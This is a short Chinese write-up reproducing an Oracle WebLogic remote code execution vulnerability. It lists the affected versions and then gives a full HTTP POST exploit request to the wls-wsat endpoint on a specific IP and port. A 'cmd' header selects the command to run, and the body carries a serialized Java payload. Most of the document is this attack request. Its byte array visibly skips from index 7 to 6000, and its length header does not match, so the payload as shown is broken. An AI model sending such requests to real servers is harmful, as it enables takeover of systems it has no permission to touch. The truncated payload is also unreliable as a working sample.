一、漏洞概述
WebLogic Server使用T3协议在WebLogic Server和客户端间传输数据和通信,由于WebLogic的T3协议和Web协议使用相同的端口,导致在默认情况下,WebLogic Server T3协议通信和Web端具有相同的访问权限。 易受攻击的WebLogic服务允许未经身份验证的攻击者通过T3网络访问及破坏Oracle WebLogic Server。此漏洞的成功攻击可能导致攻击者接管Oracle WebLogic Server,造成远程代码执行。
二、影响范围
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3
三、访问页面
四、漏洞复现
1、修改“cmd: ls /tmp”达到任意命令执行
POST http://123.58.224.8:53090/wls-wsat/CoordinatorPortType HTTP/1.1
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
cmd: ls /tmp
type: exec
Content-Length: 247032
Content-Type: text/xml
Cache-Control: no-cache
Pragma: no-cache
Host: 123.58.224.8:53090
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class="byte" length="6006"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>120</byte></void><void index="6000"><byte>112</byte></void><void index="6001"><byte>113</byte></void><void index="6002"><byte>0</byte></void><void index="6003"><byte>126</byte></void><void index="6004"><byte>0</byte></void><void index="6005"><byte>45</byte></void></array></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>